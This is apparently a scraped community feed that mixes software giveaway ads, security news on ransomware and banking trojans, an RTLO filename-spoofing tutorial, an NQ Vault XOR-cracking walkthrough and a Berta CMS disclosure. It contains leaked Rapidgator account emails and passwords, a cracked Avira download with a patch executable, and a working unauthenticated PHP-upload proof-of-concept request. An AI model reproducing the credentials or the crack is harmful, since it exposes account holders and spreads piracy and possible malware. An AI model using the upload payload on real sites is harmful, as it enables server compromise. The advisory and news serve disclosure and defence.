Search the Community

CyberSafe Top Secret Ultimate is a powerful encryption program that allows you to encrypt pretty much anything and everything: whole computer, entire disks/partitions (both internal and external drives, including USB flash), individual files, network shares, cloud storage (e.g. Google Drive or Dropbox), email, etc. Other features include support for compression, industry-standard encryption algorithms, two-factor authentication, ability to hide folders and files, and more. Get it now! Read more at Free CyberSafe Top Secret Ultimate (100% discount) - SharewareOnSale

Product Description We all like fast and secure computers, but only constant system maintenance and time-consuming optimizations will keep them that way. Those of us who like to invest time and effort to keep up with the latest developments may very well handle those tasks using default Windows tools alone. As system experts, they love to accelerate their machines, protect their privacy, clean and backup system files, fix common Windows errors any perform many other tasks. This not only sounds like a lot of work, it is! Our WinOptimizer will do the work for you, easy, fast and efficiently. It will give you maximum performance and security and save you precious time so you can get real work done instead. Ashampoo WinOptimizer 11 … … frees space Make orphaned files, program remains and temporary files disappear and delete no longer needed documents irrevocably. Find duplicate files and track down resource hogs. Reclaim your disk space! … fixes errors Clean your Windows Registry, fix file system errors and monitor the health of your disk drives. Just say No to Windows errors! … guarantees steady performance Use the powerful Live Tuner to auto-tune your applications for maximum speed and optimize your Internet connection. Get more performance out of your PC! … protects your privacy Wipe all Internet traces from your system and encrypt sensitive data safely. Now, you decide what information is automatically sent to Microsoft on a regular basis. Protect yourself against prying eyes! … customizes Windows to your needs Adjust hidden system settings, alter file type associations or adjust context menu entries easily. More flexibility for you! More power under the hood Ashampoo WinOptimizer 11 not only provides extensive system details but it is also the fastest WinOptimizer ever. Completely redeveloped core algorithms and radical program code optimization make it a screamer. Live Tuner 2.0 – More efficient, more effective, more versatile With brand-new algorithms, Live Tuner can accelerate applications more effectively while using less memory resources. Options for rule-based tuning have also been greatly enhanced. Game Booster – Turbo for gamers Game Booster gives you excellent gaming performance at the click of a button. All non-essential Windows processes will automatically be shut down and memory freed. Perfect gaming conditions instantly. User Rights Manager – Have it your way Discover the easiest way to define which actions, settings or applications can happen on your machine. For example, prevent your kids from installing programs, altering critical system settings or launching unsuitable applications. Faster, leaner, more efficient Ashampoo WinOptimizer 11 starts up faster and requires less memory. This is especially true for Live Tuner that can now optimize application processes more efficiently. The detection rate for all cleaners has been increased and the integrated backup system now supports incremental backups for modified system files. Get more out of your PC and get Ashampoo WinOptimizer 11 – the tuning specialist for your PC. -> Download <-Deal Expires in: EXPIRED! Grab 50% Discount Coupon on Ashampoo WinOptimizer 11 With Free Updates. Click Here.

Product Description With NeatMP3 Pro you can merge, organize, rename and edit the tags of your audio files in a single processing session. Just select a set of audio files, choose the way in which your files will be organized and renamed from a wide set of commonly used predefined patterns, select the location where you want your files to be moved and you’re ready to go. Get a perfectly organized music collection in just three easy steps. If the audio files that you are trying to organize have incomplete or invalid tags NeatMP3 Pro will automatically take care of them by removing the invalid tags and searching online for the missing tags. Windows version: Mac version: Want to manually edit your tags? No problem! NeatMP3 Pro also allows manual and batch id3 tag editing and offers support for Unicode characters. NeatMP3 Pro supports all the commonly used audio file formats (MP3, OGG, FLAC, WAV, MPC, AIFF, ASF, MP4) and also benefits from additional features like output preview, file search, saving the current setting as profiles for later use, logging, deleting the source photos after processing and even allows you to play the songs that you are organizing. All these features combined make NeatMP3 Pro a very useful music organizing tool that every music enthusiast should have. Supported OS: Windows (XP, Vista, 7, 8) / Mac OS X (Snow Leopard, Lion, Mountain Lion, Mavericks) System Requirements: Pentium or compatible processor at 1 GHz, 256 MB RAM, sound card Features: songs that have the same artist, genre, year or combinations of these attributes like year/artist, genre/artist/year or any other combination you would think of Edit the tags of MP3, OGG, FLAC, WAV, MPC, AIFF, ASF or MP4 files Support for Unicode characters Support for the mp3, mp4, wav, flac, aif, asf, ogg, mpc, spx and wv file extensions Automatically search online for missing tags Automatically fill missing tags by extracting them from the original file’s name Automatically erase invalid tags Rename your original files using tag information and get rid of the annoying “Track X.mp3? files Add individual files or entire folders (with sub-folders) to the organize/edit list Select the destination folder of your organized files Delete the original files after the organized files have been moved to the destination folder Play audio files so that you can easily identify the artist and title of a song Save your settings as profiles for later use Save a log file with all your processing information Batch tag editing Organize songs by Album and Album/Artist Drag and drop files directly to the list of audio files Real-time preview of the currently selected file’s output path Search for songs with a specific file extension and add the to the list of audio files Support for the m4a, wav and wave file extensions Free updates to all the future versions of the software Product Homepage Here -> Download <-Deal Expires in: EXPIRED!

In this article we will learn about the one of the most overlooked spoofing mechanisms, known as right to left override (RTLO). What is RTLO? RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading of Arabic or Hebrew text. Unicode has a special character, U+202e, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to disguise the names of files and can be attached to the carrier like email. For example, the file name with ThisIsRTLOfileexe.doc is actually ThisIsRTLOfiledoc.exe, which is an executable file with a U+202e placed just before “doc.” Though some email applications and services that block executable files from being included in messages also block .exe programs that are obfuscated with this technique, unfortunately many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. For example, let’s create a file with Name TestingRTLO[u+202E]xcod.txt. “U+202E” can be copied and pasted from the above character map present in Windows. To make sure something is present in the character, do the following steps: Create a new text document and see its properties and note down its name: Now rename the file with the copied U+202E characters and see the change in file name: Now rename the File TestingRTLO[u+202E]xcod.txt with characters inserted and see the below results. File extension types that can be dangerous The below section lists the common file types that can be used to execute unwanted code in the system: .bat .exe .cmd .com .lnk .pif .scr .vb .vbe .vbs .wsh Remediation against RTLO Though most endpoint security solutions like antivirus detect this type of spoofing, and some IRC clients even change the crafted malicious links back to original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is in the usage of the backdoor “Etumbot”. Some features of Windows also help to carry this type of attack, such as Windows hides the file extensions by default. Malicious individuals can set any icon they want for let’s say a .exe file. A file named pic.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. Uncheck this selection and Windows will stop hiding extension for known file types. Another good approach is to make sure that the folder where all the downloads take place should have its view set to ‘content’. This will make sure that the files will appear in their original form despite all the changes. Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc. Source

The mobile encryption app NQ Vault has been in the news for bad reasons. Mobile encryption apps are commonly used to prevent access to sensitive data on the phone (such as images, videos, documents and so on). These encryption apps usually offer a vault with your desired password. You can push any secret files to this vault and they would be secure, as the data present in vault is encrypted and would decrypt only when the correct password is entered. The NQ Vault app is one such mobile encryption app which boasted that it “encrypts” and secures your confidential files. All this has now become a joke and we will see why! NQ Vault allows you to pick a private passcode and “encrypts” pictures, texts, and any other data from the eyes of anyone who happens to look through your phone or device. For instance, an attacker who has access to the device should not be able to view the original files unless he knows the passcode. The idea is that even if an attacker pulls these files from the device, since they are encrypted, they would mean nothing but junk. But in case of NQ Vault, it turned out that if an attacker pulls these encrypted files, he could easily get the original files in a matter of seconds. It’s not about weak encryption The point is that NQ Vault doesn’t use any encryption algorithm to secure the user’s data. It just uses XOR substitution. So we are not talking about using a weak algorithm or a weak key. We are talking about having “no algorithm”. As discovered by blogger NinjaDoge24, NQ Vault just XORs the user’s file with a key and calls it “encrypted”. Breaking it step by step I tried to verify this practically, and here is how easy it turned out to be: Download and install the NQ Vault mobile app from Google Play Store on any Android device. Set your desired passcode (say 000). Select any secret file (for example apple.png). Here is the HEX representation of the apple.png file: Note: HEX is a positional numeral system base of 16. It uses sixteen distinct symbols, most often the symbols 0–9 to represent values zero to nine, and to represent values ten to fifteen. You can use HEX Viewer tool to view an image’s hex representation. 3. Now send the image to the NQ Vault using the app. This would mean the file apple.png is encrypted and should have been stored somewhere on the device. This is the message shown by NQ Vault: 4. These so called “encrypted” files are stored on the SD card at the location /mnt/sdcard/SystemAndroid/Data. How do I know this? Well just by looking at SQLite files in this case. Also at the above mentioned location, there is a text file saved by the app which says: 5. But these encrypted files are hidden from the user. So initially a simple ‘ls’ on the folder does not reveal anything. But ‘ls’ with –a attribute would reveal all the hidden files, as shown in the following screenshot. 6. The next thing is to pull out this encrypted file to the local machine. I used the adb pull command for this purpose. As seen below, the file is stored with a .bin extension. 7. Now see the HEX representation of this encrypted file: 8. Now just XOR abc.png & the encrypted file:\ 9. What this suggests is, based on the passcode selected by the user, it generates a “key” (30 in this case) and just XORs the user’s file with this key! Upon investigation, it turned out that this key value is always between 00 and ff, which means 255 possible values. As explained by NinjaDoge24, here are some of the passcodes and their corresponding key values: Thus, an attacker who has access to the encrypted files just need to brute force XOR with 255 possible values to get the original files back! It’s not over! The story is not over yet. It is also discovered that the app performs this worthless encryption only for the first 128 bits of the user’s file, and stores the rest in plain format. So it’s all out there in the raw for the attacker to see. For example, in the above example, notice that only the first 128 bits are XOR-ed, and rest of the bits remain the same. The below screenshot gives a clear idea: Notice that only the initial bits are transformed, while the rest of the file remains the same. Here is a simple script written by NinjaDoge24 that automates this whole process. Lessons learned Everyone makes mistakes, including reputed organizations such as Facebook, Google etc., and we all understand that. But this is just asking to be punished. All those millions of users who believed the claims of this software and unknowingly rated it at 4.6 will now feel cheated. The fact that CNET, PC Magazine and many other site reviews rated it highly points out another problem – it’s hard to trust the claims of an app just by looking at what it does. It is definitely not possible for review sites to perform a security audit of an app before they rate it. Companies need to realize the importance of the trust that users have in their brand and also need to remember that once lost, it’s very hard to gain it back. Source

Avira System Speedup 1.6.2.120 + Patch.rar ----------------------- Avira System Speedup is A Comprehensive, full-Featured software tool That Will help you to keep your system free of all unnecessary files. Junk files, obsolete registry entries, temporary files, Web history, traces and logs ... they only take up too much of your computer's valuable space, slow down its performance and are a constant threat to your privacy. This fast and efficient tool can get rid of them all in a snap. System Speedup comes wrapped up in an attractive and well-structured interface. Together with a first section that offers you statistical information about your system, the program's main set of tools is divided into two big groups - System Cleaner and System Optimizer. All scanning Processes are Performed at High Speed, Producing clear and Detailed results. Salient Features Deep scan Disk Doctor to the Rescue Customize or Automate Process Manager Monitor Driver Disk Analyzer Registry Cleaner & Junk File Startup Manager Uninstaller System Optimizer Disk Wiper Smart Defragmenter & many more ... Steps To Get Full Version Download and install Avira System Speedup Close Program after first Run avirasystemspeedup_patch.exe Open and Click Patch button That's All, you are done !! Enjoy https://www.sendspace.com/file/mqmhcs

Researchers have seen an uptick in Adobe Flash .SWF files being used to trigger malicious iFrames across websites. Several hundred WordPress and Joomla websites have been swept up in the campaign, first observed by researchers at the firm Sucuri last November. “Though it’s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar,” Peter Gramantik, a senior malware researcher at the firm wrote Thursday. According to Gramantik the infection is clearly marked by a .SWF file with three random characters as a name that’s stored in a site’s images/banners/ folder. As far as the firm has seen, each file has a random hashed ID parameter attached to the end of it. While the malware’s variable names, coding logic, and UserAgent remain the same, one of the main differences from last November’s version of the campaign and this one is that this incarnation has spread to from Joomla sites to WordPress sites. As is to be expected, the website delivering the malicious payload has changed as well. The .SWF files, also known as small web format files, inject an invisible iFrame, which can go on to drop other exploits. Source

31 March is World Backup Day, a chance for us all to avoid being April Fools by making sure we have secure backups of all our most important data. On last year's Backup Day, we provided a rundown of the most basic and important steps you can take to ensure your files can be retrieved in the event of a disaster. Most physical storage media, from hard drives and USB flash drives to CDs and DVDs, are vulnerable to damage from flood, fire, or sudden impact (sometimes even simply dropping them on the floor). That's not to mention having your laptop stolen, losing a USB drive, or indeed corruption or accidental deletion, so having a single copy of your important files is never a good idea. Of course, keeping a second copy right next to the computer holding your main copy is not going to help in the event of a fire or burglary. As a result, a range of online backup services has emerged in recent years, providing handy options for simple, low-cost backups that are shielded from many of the risks of copies stored in your home or office. There are some issues to consider here too, though, especially in terms of privacy. Depending on the service you use and the location of its servers, your data could be open to the prying eyes of government agencies and even hackers, so it's advisable to use strong encryption of your own if you need to upload data to a cloud service while keeping its content private. Make sure access is controlled with strong passwords and 2-factor authentication to keep unwanted people out of your account, and don't forget to pay the subscription fee, as your data may automatically be deleted if your account expires. The ransomware threat When we last covered World Backup Day, ransomware was a relatively new addition to the range of headaches facing us, with CryptoLocker hitting headlines around the world in late 2013. Since then ransomware has become a popular money-making tactic for cybercriminals, evolving multiple variants including CryptoWall and CryptoDefense, and going after iPhone users, gamers and companies' customer databases. Of course, ransomware wasn't invented with CryptoLocker – the AIDS Information Trojan, created in late 1989, was probably the first example of malware that scrambled your data and demanded money to decrypt it. But the inclusion of properly-implemented cryptography in CryptoLocker and its followers - rendering the files it targets for all practical purposes irretrievable without paying up - has turned it from an annoyance into a calamity for those affected. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. However, as we've seen, even in settings where you would expect secure computing practices, they're not always in place, with organisations from police departments to entire school districts finding their data locked up and held to ransom. Malicious encryption Having malicious software running on your computer, encrypting files at will, adds a further complication to the backup process. Many ransomware variants don't just scramble your C: drive. They look for any device that can be accessed as if it were a disk drive, including USB drives, network shares and even cloud-based storage, if it is mounted as a directly-accessible network drive. This could result in the double nightmare of having your carefully stowed backups also encrypted and locked up. There's also a risk with more basic scheduled backup systems that your local files could get encrypted, then backed up, overwriting existing "clean" backups so that even if you restore your backup, you are still stuck with scrambled files. Stepped backups So, there's a strong argument for some sort of stepped approach to backing up, using at least two separate backup devices and updating one or the other alternately on a regular basis, checking the integrity of the data stored on them each time. That way, you're reasonably sure you won't lose more than a few days or weeks' worth of data, even in the case of the most devious and long-lasting infection. The main point of World Backup Day is to make sure those of us who have yet to make any sort of effort to secure our data make a start and take those first basic precautions. If you haven't yet backed up any of your stuff, now would be a really good time to get moving. Sursa: https://nakedsecurity.sophos.com

Storage used 6.14 GB Storage available 5.99 TB of 6 TB Bandwith available 1.62 TB of 3 TB Number of files 5 fab_thefab@hotmail.com : cocorico http://rapidgator.net/profile/index ................................................................................................................. Storage used 15.34 MB Storage available unlimited Bandwith available 250.51 GB of 1 TB Number of files 1 syljohnson@gmx.de : buck65 http://rapidgator.net/profile/index ................................................................................................................... Storage used 28.91 MB Storage available 6 TB of 6 TB Bandwith available 1.66 TB of 3 TB Number of files 2 mtbuster@me.com : booboo http://rapidgator.net/profile/index .............................................................................................................. Enjoy

Berta CMS is a web based content management system using PHP and local file storage. http://www.berta.me/ Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software. We found that the file upload didn't require authentication. Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/> We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues. The author was notified: 2015-03-22 Author Acknowledge: 2015-03-23 Patch released: 2015-03-26 The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files. This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails). The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.101/upload.html Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802 Content-Length: 1617 -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="Filedata"; filename="c.php" Content-Type: text/php GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$*]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ P*s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö*a[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <*H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v 3jy'ž„šÉç£/øY …B h¤œ^ž f<‹’FP‹(n %¤¤² )›q *{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦*kÒ¥`ž‚ k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/* `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«* £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ *Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³*²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k*øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ; -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="submit" Upload Image -----------------------------2147563051636691175750543802-- Simon Waters phone +448454681066 email simon.waters@surevine.com skype simon.waters.surevine Participate | Collaborate | Innovate Surevine Limited Source

Product Description WinUtilities Pro is an award winning collection of tools to optimize and speedup your system performance. This suite contains utilities to clean registry, temporary files on your disks, erase your application and internet browser history, cache and cookies. It also supports to defragment your disk drives and registry to improve computer performance and stability. built-in Startup Cleaner allows you to control startup programs that load automatically with windows, find duplicate files, fix broken shortcuts and uninstall unneeded software. More features include secure file deletion, recycle bin shredding, maintenance tasks scheduling and file recovery. Complete Solution for PC Peak Performance A simple registry cleaner or disk cleaner cannot give you true performance boost. WinUtilities combines disk clean&defrag, registry clean&defrag, system optimization, shortcut fix, privacy sweep, junk files clean, disk optimization, and more, to guarantee your PC run like a new one. Fast and Powerful Windows Clean Swiftly locates and deletes any junk files that may exist in Recycle Bin, Recent Documents, Temporary files, Log files, Clipboard, DNS Cache, Error Reporting, Memory Dumps, Jump Lists. Clean and Fix PC problems with One-Click Built-in 1-Click maintenance feature allows you to cleans junk files and unneeded registry entries, scan & fix PC problems to improve the system performance of your PC by one simple click. Improves PC Performance Better PC performance for your work or gaming. Gives you the new computer feeling again. Simpler and Easier to Use You do not need to be a professional or know much about computer. All you need to do is install it and a few clicks will make you enjoy the new PC feeling again. Proven by More Users WinUtilities is the top 5 downloaded software in Maintenance & Optimization category and has over 10 million users worldwide. What’s new in WinUtilities version 11.3 Improves 1-Click Maintenance module Improves internal architecture for better performance Improves Disk Cleaner module Updates Process Security database Updates various translations Many performance improvements and bug fixes Product Homepage Here -> Download <-Deal Expire in: EXPIRED!

Tearing a page, so to speak, from social media crowdfunding campaigns like last year's ALS Ice Bucket Challenge, the National Archives has turned to Twitter to raise a volunteer workforce of citizen archivists to help transcribe some of millions of digitized documents—including thousands of declassified CIA and Department of Defense files. The goal of the Transcription Challenge: 1,000 transcribed pages of documents by March 23. The Transcription Challenge corresponds with Sunshine Week, an open government campaign originally launched by the Florida Society of Newspaper Editors as Sunshine Sunday in 2002. The event was adopted by the American Society of Newspaper Editors and extended to a week in 2003, and it has since picked up support from the Reporters Committee for the Freedom of the Press, Bloomberg, The Gridiron Club, and the John S. and James L. Knight Foundation. The National Archives is looking for individuals interested in helping to use Twitter and the hashtag #1000pages to claim documents for transcription and tell the Archives' staff what they've found. In addition to CIA and other declassified files, the Archives is offering up a number of other "missions," ranging from National Forest documents and photos to papers of the Continental Congress and records of the Confederate Government. There are also audio recordings of interviews conducted by the 9/11 commission. Source

Product Description RaidLabs File Uneraser reliably recovers deleted files and documents, undeletes digital pictures, music, videos, RAR and ZIP archives. The file recovery tool can undelete entire folders. This file recovery software can help in cases when anything else is helpless. File Uneraser can undelete files from all types of storage media including memory sticks, digital cameras, flash drives, USB drives and pretty much any other type of a storage device you can connect to your PC and access as a drive letter. In addition, this undelete software works with NTFS-encrypted and compressed files, and can help you recover files lost from a virus attack, malicious or accidental user activities. No special skills and no information recovery training are required! Try File Uneraser free with full pre-recovery preview. RaidLabs File Uneraser can: Undelete all types of files Unerase deleted documents, pictures, emails, archives, audio and video files Undelete files from emptied Recycle Bin Recover data from FAT and NTFS partitions Perform comprehensive recovery by scanning the entire volume Undelete files from NTFS disks even in older versions of Windows Preview deleted files even in the free version Fully Guided Recovery RaidLabs File Uneraser features a comprehensive and fully guided data recovery wizard. When you start the tool, a wizard will guide you through the entire recovery process, helping you choose the right options in order to perform the safest and most complete recovery. After the disk scan is complete, you’ll see an Explorer-like window listing all recoverable files. You can view any file with a single click or add one to the recovery list with a double-click. If you are about to recover more than just a few files, you can use the search function to choose files of a certain type, select entire folders or choose to restore everything that’s still recoverable. Full Auto Mode You can run File Uneraser in full auto mode, letting it scan your disk and choose the optimal recovery strategy on your behalf. In this mode, the undelete tool scans a target drive automatically and selects the perfect solution to restore as many files as possible. File Uneraser features a number of functional and convenience features usually not available in its price range. Major Highlights PowerSearch performs the complete disk scan in order to locate recoverable files not listed in the file system LivePreview allows previewing more than 250 types of files in live mode with no external viewers required You can view deleted documents and pictures, play music and videos and enter deleted archives like folders even in the free version of File Uneraser Undelete files in Microsoft Windows 2000 / XP / 2003 / Vista / Windows 7 and 8 Full FAT, FAT32, NTFS and NTFS5 support A unique technology for recovering deleted files stored on FAT32 volumes; Recovers encrypted and compressed files from NTFS and NTFS5 disks. -> Download <-Deal Expire in: EXPIRED!

Gamers may soon be feeling the pain of crypto-ransomware. A variant of CryptoLocker is in the wild that goes after data files associated with 20 different online games, locking downloadable content in an attempt to target younger computer users. Researchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant. “The website is based on WordPress and could have been compromised by any one of the numerous WP exploits,” wrote Vadim Kotov in an advisory for Bromium. “Additionally, the URL where the malicious Flash file is hosted keeps changing.” Kotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit CVE-2013-2551. The malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted, and a ransom must be paid with Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working. More than 50 file extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin’s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium said. “Encrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminal target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,” Kotov wrote. “Non gamers are also likely to be frustrated by these attacks if they lose their their personal data.” Some of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote. The Bromium advisory goes into more detail about command and control communication and encryption mechanisms. The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet. “As more file categories are infected, a broader audience is affected,” Kotov said. “The attackers are also getting better at incorporating BitCoin code directly into their projects, which isn’t a good sign.” Source

Not long ago, criminals pushing the Dridex banking Trojan were using Microsoft Excel documents spiked with a malicious macro as a phishing lure to entice victims to load the malware onto their machines. Even though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure. Researchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users’ trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines. The XML files are passed off as “remittance advice,” or payment notifications, with the hopes that some users will believe it’s an innocent text file and execute the malicious code. “XML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,” said Karl Sigler, Trustwave threat intelligence manager. The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to viewed properly or to ensure proper security. “Which is the exact opposite of what this does,” Sigler said. “It doesn’t seem to be all that sophisticated. They’re either trying to capitalize on a user’s trust in XML files, or the fact that a user may not be that familiar with what that extension is.” If the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visiting an online banking site and then injects code onto the bank site in order to capture the user’s credentials for their online account. Sigler said this is the first time they’ve spotted XML docs used as a lure. As for macros, they’ve been disabled by default since Office 2007 was released. “Sometimes in large organizations, local administrators have the ability to enable macros,” Sigler said. “Some organizations use them quite a bit, but it’s not common. Most people leave the default settings. It’s hard to say why these guys moved to XML. It could be that they’re looking for a new attack vector and they weren’t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they’re looking for a way to better their success rate.” Dridex is a descendent of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others. Source

Product Description With DVR Converter you can convert videos in the formats mpeg/mpg, ts, mod, tod, vro, dvr, pvr, mts, m2ts, tp0 and trp to video streams compatible with WMV, DivX/Xvid/HDX4/MPEG4 (.avi or .mp4), h.264 or MPEG2. This leads to a high compatibility of your digital video recordings. The created files can be processed with almost any other program and played on a large number of hardware players. Features: Conversion of mpeg/mpg, ts, mod, tod, vro, dvr, pvr, mts, m2ts, tp0 and trp video files. mpeg compatible files, made with devices from among the following companies: Digital Everywhere, Opera, Siemens. ts compatible files, made with devices from among the following companies: ABCom, AEG, Anubis, Arcon, Astro, Astrotel, Atevio, beyonwiz, Centarea, Comag, Compro, Conceptronic, Coolstream, Darkbox, DGStation, Digitalbox, Digittrade, Dream Multimedia bzw. Dreambox, DVICO, EasyOne, Ellion, Emtec, Geniatech, Genius, Hauppauge, Humax, Hyro, Icecrypt, icom, Kathrein, KNC ONE, KWorld, Medion, Megasat, Netgear, Octagon, Optibox, Orbitech, Pinnacle, Protek, Rebox, Samsung, Satelco, SetOne, SilverCrest, Sony, Teac, TechniSat, TechnoTrend, Telestar, Terratec, Toshiba, Trekstor, TwinHan, Zyxel. dvr compatible files, made with devices from among the following companies: COMAG, Edision, Imperial, Micro electronic, Pearl, Preisner, Smart, Xoro. pvr compatible files, made with devices from among the following companies: Targa TSR 5100 HDD and ADT. mts compatible files, made with devices from among the following companies: AVCHD compatible cams from e.g. Canon and Panasonic, and devices from Micronik. m2ts compatible files from e.g. Blu-ray discs. tp0 compatible files, made with devices from among the following companies: Topfield, Dick Smith, Homecast, Hyundai, Jepssen, Mascom. trp compatible files, made with devices from among the following companies: ABCom, Arion, BELdigital, CGV, Clarke-Tech, CreNova, DGStation, Dmsis, Edision, GSS, Hirschmann, Intek Digital, Inverto, Kaon, Lyngbox, NanoXX, OPTICUM, Pixx, Quelle or rather Universum, Schwaiger, Sezam. Converts videos to video files compatible with DivX/Xvid, h.264, MPEG2, MP4, DVD, SVCD and WMV. Supports SD and HD as input and output format. Supports PAL and NTSC as input and output format. The video conversion automatically considers the correct aspect ratio. Capable filters ensure optimum results when enlarging or reducing images. Shows resolution, framerate and bitrate of input files. Burning of CDs and DVDs. An integrated player allows watching of all input videos before conversion! -> Download <-Deal Expires in: EXPIRED!

